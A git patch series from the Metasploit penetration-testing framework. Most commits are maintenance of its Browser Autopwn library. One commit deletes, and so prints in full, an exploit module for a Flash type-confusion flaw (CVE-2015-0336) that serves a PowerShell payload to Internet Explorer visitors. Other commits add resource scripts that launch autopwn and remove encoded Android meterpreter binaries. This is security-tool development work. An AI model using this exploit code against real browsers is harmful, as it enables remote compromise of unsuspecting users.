From 0384b115e96ddea36bea320ebb5e0994ea160bbb Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 17:41:02 -0500
Subject: [PATCH 0257/1013] Fix reload bug

---
 lib/msf/core/exploit/browserautopwnv2.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index c020e6161d..ea7956435b 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -47,11 +47,12 @@ module Msf
     #
     # @return [void]
     def init_exploits
+      $stderr.puts "In init_exploits"
       # First we're going to avoid using #find_all because that gets very slow.
       framework.exploits.each_pair do |fullname, place_holder|
         # If the place holder isn't __SYMBOLIC__, then that means the module is initialized,
         # and that's gotta be the active browser autopwn.
-        next if !fullname.include?('browser') || place_holder != '__SYMBOLIC__'
+        next if !fullname.include?('browser') || self.fullname == "exploit/#{fullname}"
 
         # The user gets to specify which modules to include/exclude
         next if datastore['Include'] && fullname !~ datastore['Include']

From 58c57673302ce3bdc5cc2444945c55b9f6bb540d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 17:41:29 -0500
Subject: [PATCH 0258/1013] Don't need stderr.puts

---
 lib/msf/core/exploit/browserautopwnv2.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index ea7956435b..59eff4ecd9 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -47,7 +47,6 @@ module Msf
     #
     # @return [void]
     def init_exploits
-      $stderr.puts "In init_exploits"
       # First we're going to avoid using #find_all because that gets very slow.
       framework.exploits.each_pair do |fullname, place_holder|
         # If the place holder isn't __SYMBOLIC__, then that means the module is initialized,

From e83677d29da763e57976293f9074589bdee210df Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 17:43:26 -0500
Subject: [PATCH 0259/1013] rm deprecated mod

---
 .../adobe_flash_net_connection_confusion.rb   | 121 ------------------
 1 file changed, 121 deletions(-)
 delete mode 100644 modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb

diff --git a/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb
deleted file mode 100644
index 3bcb6a7130..0000000000
--- a/modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb
+++ /dev/null
@@ -1,121 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
-
-  include Msf::Exploit::Powershell
-  include Msf::Exploit::Remote::BrowserExploitServer
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2015, 7, 27), 'exploit/multi/browser/adobe_flash_net_connection_confusion')
-
-  def initialize(info={})
-    super(update_info(info,
-      'Name'                => 'Adobe Flash Player NetConnection Type Confusion',
-      'Description'         => %q{
-        This module exploits a type confusion vulnerability in the NetConnection class on
-        Adobe Flash Player. When using a correct memory layout this vulnerability allows
-        to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
-        vectors, and finally accomplish remote code execution. This module has been tested
-        successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.
-      },
-      'License'             => MSF_LICENSE,
-      'Author'              =>
-        [
-          'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit
-          'Unknown', # Exploit in the wild
-          'juan vazquez' # msf module
-        ],
-      'References'          =>
-        [
-          ['CVE', '2015-0336'],
-          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'],
-          ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'],
-          ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'],
-          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'],
-          ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/']
-        ],
-      'Payload'             =>
-        {
-          'DisableNops' => true
-        },
-      'Platform'            => 'win',
-      'BrowserRequirements' =>
-        {
-          :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
-          :flash   => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') },
-          :arch    => ARCH_X86
-        },
-      'Targets'             =>
-        [
-          [ 'Automatic', {} ]
-        ],
-      'Privileged'          => false,
-      'DisclosureDate'      => 'Mar 12 2015',
-      'DefaultTarget'       => 0))
-  end
-
-  def exploit
-    @swf = create_swf
-    @trigger = create_trigger
-    super
-  end
-
-  def on_request_exploit(cli, request, target_info)
-    print_status("Request: #{request.uri}")
-
-    if request.uri =~ /\.swf$/
-      print_status('Sending SWF...')
-      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
-      return
-    end
-
-    print_status('Sending HTML...')
-    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
-  end
-
-  def exploit_template(cli, target_info)
-    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
-    target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
-
-    trigger_hex_stream = @trigger.unpack('H*')[0]
-
-    html_template = %Q|<html>
-    <body>
-    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
-    <param name="movie" value="<%=swf_random%>" />
-    <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" />
-    <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" Play="true"/>
-    </object>
-    </body>
-    </html>
-    |
-
-    return html_template, binding()
-  end
-
-  def create_swf
-    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf')
-    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
-
-    swf
-  end
-
-  def create_trigger
-    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf')
-    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
-
-    swf
-  end
-end

From 28d35a5bf47886a258c0ddc6d7e72407dff8916e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 18:03:56 -0500
Subject: [PATCH 0260/1013] Update doc

---
 lib/msf/core/exploit/browserautopwnv2.rb | 24 +++++++++++++++++++++---
 1 file changed, 21 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 59eff4ecd9..df0fc0c2a8 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -299,7 +299,7 @@ module Msf
 
     # Returns the selected payload's LPORT.
     #
-    # @param [String] platform
+    # @param [Symbol] platform
     # @return [Fixnum]
     def get_selected_payload_lport(platform)
       datastore["PAYLOAD_#{platform.to_s.upcase}_LPORT"]
@@ -373,6 +373,13 @@ module Msf
     end
 
 
+    # Checks whether the payload is compatible with the module based on platform information.
+    # Best for single-platform modules and for performance.
+    #
+    # @param [Object] m Module.
+    # @param [Symbol] payload_platform Payload platform.
+    # @return [TrueClass] Payload is compatible.
+    # @return [FalseClass] Payload is not compatible.
     def is_payload_platform_compatible?(m, payload_platform)
       begin
         platform_obj = Msf::Module::Platform.find_platform(payload_platform.to_s)
@@ -386,6 +393,13 @@ module Msf
     end
 
 
+    # Checks whether the payload is compatible with the module based on the module's compatibility list.
+    # Best for multi-platform modules. This is much slower than #is_payload_platform_compatible?
+    #
+    # @param [Object] m Module.
+    # @param [String] payload_name
+    # @return [TrueClass] Payload is compatible.
+    # @return [FalseClass] Payload is not compatible.
     def is_payload_compatible?(m, payload_name)
       m.compatible_payloads.each do |k|
         return true if k[0] == payload_name
@@ -395,13 +409,17 @@ module Msf
     end
 
 
+    # Checks if the module is multi-platform based on the directory path.
+    #
+    # @param [Object] m Module.
+    # @return [TrueClass] Module is multi-platform.
+    # @return [FalseClass] Module is not multi-platform.
     def is_multi_platform_exploit?(m)
       m.fullname.include?('multi/')
     end
 
 
-    # Returns the selected payload. This method will choose a compatible payload based on the
-    # default list.
+    # Returns an appropriate payload that's compatible with the module.
     #
     # @param [Object] m A module that's been initialized.
     # @return [String] Payload name. Example: 'windows/meterpreter/reverse_tcp'

From 5c890004b80462bc5d6340539a51afbd61f4fe85 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 18:32:57 -0500
Subject: [PATCH 0261/1013] Do stop_service in cleanup

---
 lib/msf/core/exploit/browserautopwnv2.rb | 1 +
 lib/msf/core/exploit/tcp_server.rb       | 4 +---
 2 files changed, 2 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index df0fc0c2a8..280e2359f3 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -141,6 +141,7 @@ module Msf
       rm_target_info_notes
       rm_exploit_jobs
       rm_payload_jobs
+      stop_service if service
     end
 
 
diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb
index 3744de0782..14af809cc9 100644
--- a/lib/msf/core/exploit/tcp_server.rb
+++ b/lib/msf/core/exploit/tcp_server.rb
@@ -71,9 +71,7 @@ module Exploit::Remote::TcpServer
     super
     if(service)
       stop_service()
-      unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-        print_status("Server stopped.")
-      end
+      print_status("Server stopped.")
     end
   end
 

From 6bb368d7342e01155ec7bf432e426cac3ce7e3a9 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 30 May 2015 16:15:29 -0500
Subject: [PATCH 0262/1013] Add resource scripts

Easier for everybody to use
---
 scripts/resource/bap_dryrun_only.rc  | 10 ++++++++++
 scripts/resource/bap_firefox_only.rc |  8 ++++++++
 scripts/resource/bap_flash_only.rc   |  8 ++++++++
 scripts/resource/bap_ie_only.rc      |  8 ++++++++
 4 files changed, 34 insertions(+)
 create mode 100644 scripts/resource/bap_dryrun_only.rc
 create mode 100644 scripts/resource/bap_firefox_only.rc
 create mode 100644 scripts/resource/bap_flash_only.rc
 create mode 100644 scripts/resource/bap_ie_only.rc

diff --git a/scripts/resource/bap_dryrun_only.rc b/scripts/resource/bap_dryrun_only.rc
new file mode 100644
index 0000000000..dc5e02ddc7
--- /dev/null
+++ b/scripts/resource/bap_dryrun_only.rc
@@ -0,0 +1,10 @@
+<ruby>
+print_status("Starting BAP...")
+print_status("Exploits will not be actually served, but you will know which ones each client might be vulnerable to.")
+print_status("You can do 'notes -t baps.clicks' in msfconsole to see track clicks and client-specific exploit info.")
+run_single("use exploit/multi/browser/autopwn")
+run_single("set RealList true")
+run_single("set MaxSessions 0")
+run_single("set Content \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
+run_single("run")
+</ruby>
\ No newline at end of file
diff --git a/scripts/resource/bap_firefox_only.rc b/scripts/resource/bap_firefox_only.rc
new file mode 100644
index 0000000000..e33f7813b5
--- /dev/null
+++ b/scripts/resource/bap_firefox_only.rc
@@ -0,0 +1,8 @@
+<ruby>
+print_status("Starting Browser Autopwn with Firefox-only BrowserExploitServer-based exploits.")
+print_status("Older Firefox exploits don't use BES, therefore will not be loaded.")
+run_single("use exploit/multi/browser/autopwn")
+run_single("set Include (mozilla_firefox|firefox)_")
+run_single("set RealList true")
+run_single("run")
+</ruby>
\ No newline at end of file
diff --git a/scripts/resource/bap_flash_only.rc b/scripts/resource/bap_flash_only.rc
new file mode 100644
index 0000000000..4a764ee960
--- /dev/null
+++ b/scripts/resource/bap_flash_only.rc
@@ -0,0 +1,8 @@
+<ruby>
+print_status("Starting Browser Autopwn with Adobe Flash-only BrowserExploitServer-based exploits.")
+print_status("Older Adobe Flash exploits don't use BES, therefore will not be loaded.")
+run_single("use exploit/multi/browser/autopwn")
+run_single("set Include adobe_flash")
+run_single("set RealList true")
+run_single("run")
+</ruby>
\ No newline at end of file
diff --git a/scripts/resource/bap_ie_only.rc b/scripts/resource/bap_ie_only.rc
new file mode 100644
index 0000000000..935afa0560
--- /dev/null
+++ b/scripts/resource/bap_ie_only.rc
@@ -0,0 +1,8 @@
+<ruby>
+print_status("Starting Browser Autopwn with IE-only BrowserExploitServer-based exploits.")
+print_status("Older IE exploits don't use BES, therefore will not be loaded.")
+run_single("use exploit/multi/browser/autopwn")
+run_single("set Include (ms\\\\d\\\\d_\\\\d+|ie)_")
+run_single("set RealList true")
+run_single("run")
+</ruby>
\ No newline at end of file

From ab443cbae3b9cfb7c7f21e540d7d9917ecfa24f9 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 30 May 2015 19:29:14 -0500
Subject: [PATCH 0263/1013] Small description update

---
 scripts/resource/bap_dryrun_only.rc | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/scripts/resource/bap_dryrun_only.rc b/scripts/resource/bap_dryrun_only.rc
index dc5e02ddc7..2eb5619401 100644
--- a/scripts/resource/bap_dryrun_only.rc
+++ b/scripts/resource/bap_dryrun_only.rc
@@ -1,7 +1,7 @@
 <ruby>
 print_status("Starting BAP...")
-print_status("Exploits will not be actually served, but you will know which ones each client might be vulnerable to.")
-print_status("You can do 'notes -t baps.clicks' in msfconsole to see track clicks and client-specific exploit info.")
+print_status("Exploits will not be actually served, but you will know which ones the clients might be vulnerable to.")
+print_status("You can do 'notes -t baps.clicks' in msfconsole to track clicks and client-specific exploit info.")
 run_single("use exploit/multi/browser/autopwn")
 run_single("set RealList true")
 run_single("set MaxSessions 0")

From 55a2aa43b52cf9ce6e9994541471e7283935a744 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 30 May 2015 19:31:28 -0500
Subject: [PATCH 0264/1013] Update bap_dryrun_only.rc

---
 scripts/resource/bap_dryrun_only.rc | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/scripts/resource/bap_dryrun_only.rc b/scripts/resource/bap_dryrun_only.rc
index 2eb5619401..855aca5f4d 100644
--- a/scripts/resource/bap_dryrun_only.rc
+++ b/scripts/resource/bap_dryrun_only.rc
@@ -5,6 +5,12 @@ print_status("You can do 'notes -t baps.clicks' in msfconsole to track clicks an
 run_single("use exploit/multi/browser/autopwn")
 run_single("set RealList true")
 run_single("set MaxSessions 0")
+
+# Instead of set Content, you can also do set Custom404 to redirect the client to an SE training website
+# For example (why don't you try this? :-) )
+# run_single("set Custom404 https://www.youtube.com/watch?v=dQw4w9WgXcQ")
+
 run_single("set Content \"Hello, this is a security test. You shouldn't have clicked on that link :-)\"")
+
 run_single("run")
 </ruby>
\ No newline at end of file

From 64e86165ef804681514652695f403f4c922e7793 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Thu, 28 May 2015 17:34:34 -0500
Subject: [PATCH 0265/1013] remove android meterpreter bins, update to payloads
 1.0.2

This switches us to using the Android payload files from the
metasploit-payloads gem
---
 .gitignore                                      |   3 +++
 Gemfile.lock                                    |   4 ++--
 data/android/apk/AndroidManifest.xml            | Bin 3680 -> 0 bytes
 data/android/apk/classes.dex                    | Bin 8908 -> 0 bytes
 data/android/apk/resources.arsc                 | Bin 580 -> 0 bytes
 data/android/libs/armeabi/libndkstager.so       | Bin 13496 -> 0 bytes
 data/android/libs/mips/libndkstager.so          | Bin 5424 -> 0 bytes
 data/android/libs/x86/libndkstager.so           | Bin 5204 -> 0 bytes
 data/android/meterpreter.jar                    | Bin 42817 -> 0 bytes
 data/android/metstage.jar                       | Bin 1787 -> 0 bytes
 data/android/shell.jar                          | Bin 1818 -> 0 bytes
 lib/msf/core/exploit/android.rb                 |   3 +--
 metasploit-framework.gemspec                    |   2 +-
 .../payloads/stagers/android/reverse_http.rb    |   4 ++--
 .../payloads/stagers/android/reverse_https.rb   |   4 ++--
 modules/payloads/stagers/android/reverse_tcp.rb |   4 ++--
 modules/payloads/stages/android/meterpreter.rb  |   7 ++-----
 modules/payloads/stages/android/shell.rb        |   3 +--
 18 files changed, 16 insertions(+), 18 deletions(-)
 delete mode 100644 data/android/apk/AndroidManifest.xml
 delete mode 100644 data/android/apk/classes.dex
 delete mode 100644 data/android/apk/resources.arsc
 delete mode 100644 data/android/libs/armeabi/libndkstager.so
 delete mode 100644 data/android/libs/mips/libndkstager.so
 delete mode 100644 data/android/libs/x86/libndkstager.so
 delete mode 100644 data/android/meterpreter.jar
 delete mode 100644 data/android/metstage.jar
 delete mode 100644 data/android/shell.jar

diff --git a/.gitignore b/.gitignore
index 2151978a0c..532dcce24a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -69,7 +69,10 @@ external/source/exploits/**/Release
 # the metasploit-payloads gem.
 data/meterpreter/*.dll
 data/meterpreter/*.bin
+data/meterpreter/*.jar
 data/meterpreter/*.lso
+data/android
+data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
diff --git a/Gemfile.lock b/Gemfile.lock
index 6cc9dd5063..61f8b16fdc 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 1.0.1)
+      metasploit-payloads (= 1.0.2)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.1)
+    metasploit-payloads (1.0.2)
     metasploit_data_models (1.1.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml
deleted file mode 100644
index 8671dfed52c98005b2a05510b88b65a91b8e93de..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 3680
zcmb`K&u&{q6vn?BH)$YE8zB5CP1}@GRUp-Y3L(^;l>m)MTok921tKvJ!0Mkwj;Tb2
zfCu0acm#x4^a*&DE?BT)6|sTeH@>HKCMnmgxYp-0_spE%oSC^kH>qh-o5!U>bNX{a
zx}d@J+n}kJX}^Wm(5L7Yx`%#356~azZ*;tnuAn9KF}jEDqlq!;6Z9+ELzin(7u`pH
zp|_7n-=W{p9=bd(t)NZxJ^C5_f*znfG^M-RQdhg`Xj^x*$oCg`4)!$F*6q|YjqNbD
z#mJlbXkWZ^gq|2V&idN=j1gYvxO)1UcAs*To;wh_%-F$7uhZM(v!g3o;IpgG%kgd6
z^=y2d-fdV5_;<)-0n!%Ze7~OyT1OevCgLXFUolRc*X=a2qc2lj58rIbtfw4%^zRaP
zD`nUtgI%(V_?q6t^F|_lLyzaaguExx2@QNZ^mQS2=#71rPNmrg>#sA@!EtphtEqLp
z%M;V&dmZ-05hEL%<{~jIJ{x894PAru0rxFfjYO7Sdm`c@tn1KP%(0;r?iLeqnO5_O
z^L#I@_;BL+5%XLlqlT8q>O);k*_b!H;!$_sYilM_OREs1GmnvjcYm2*NPqTz{MpBf
z_i1?@4R(47)-^IXJtD!UvBGC~7o_<SqX&EFbM`an=V?9d!MPC`H^_cDJ!2ch{vQ;d
z$2uSXD&9}IoE$M1@5U<8YuM3$eS=+y^PghAom3S%REsthp<g*&QCwkse;4)iE%QuM
zBUbUdUN#QtwZF&j-rtv~L>;P)@4LiKJmk4Di+9KV%2rR*h<1JK&+gHlwUKtodG+($
zqVjD+c3uacg5gYDTfMSDM4jiz&tQ{tyqb1V`mvaV!(NUR#T+_@YAT8X@g~H~=q37j
zP3a#lUW?RW?(uKhBKv(kO?#FPudsA^oG<rHN;3dctnD#`uV(B1r?69{&({2Rux7a5
z*EDVO9q%jUfpwqxp0`%!o5uyu^LV^3UiAlfW}HCI%{F*>T=2Z+KJC%GnUZH4ygV*=
zUV9bqnUZH4ygV*=vA_Sd-e*gmZSeBA;Q0)y@_Vl2*#<9<3!cxQiZ@&GY=f7_1<z+z
z#e2Tw*#<9<3!cxciuXdvvkhJz7d)R?74OB8XB)gcE_gn(DxQD8ex7ZEm&XOqXI8~K
zS@LXym&XOqXI8~KZ2$7O;Q7p|c>ep`>$Q#i^0?r6?ke7?l4l#dJT7=Xvnt+P$+Hb!
z9v3|Caqv#l&g&ol9;ANOOIaNI!Eu}ToNL6Lp`F)d{%v>|cbzO;FLRcCu7_ul_tVz=
zS4&^;=eajOuE^c~7;}zxp1awvAhT^_FXm|v#|6)0!hfFjVLaz%o^9~*xbT}1y!oN=
djt#%}F2-LN^7|~pe{sm~x?Ys;pzy~#^I!P7zs&#u

diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex
deleted file mode 100644
index 598f2bd3db133b3eca4a6657dd7160cedfb38f32..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8908
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
